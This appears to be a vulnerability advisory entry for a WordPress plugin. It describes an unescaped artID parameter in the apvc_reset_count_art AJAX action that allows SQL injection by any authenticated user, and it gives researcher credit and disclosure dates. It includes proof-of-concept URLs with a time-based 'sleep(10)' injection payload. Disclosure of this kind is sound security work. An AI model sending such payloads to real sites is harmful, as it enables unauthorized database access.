The plugin does not escape the artID parameter before using it in a SQL statement in the apvc_reset_count_art AJAX action, available to any authenticated user, leading to a SQL injection
v <= 5.0.8 - https://example.com/wp-admin/admin-ajax.php?action=apvc_reset_count_art&artID=sleep(10) v < 6.1.6 - https://example.com/wp-admin/admin-ajax.php?action=apvc_reset_count_art&artID=sleep(10)&security_nonce=xxxx
Krzysztof Zając
Krzysztof Zając
Yes
2022-03-29 (about 10 months ago)
2022-03-29 (about 10 months ago)
2022-06-15 (about 7 months ago)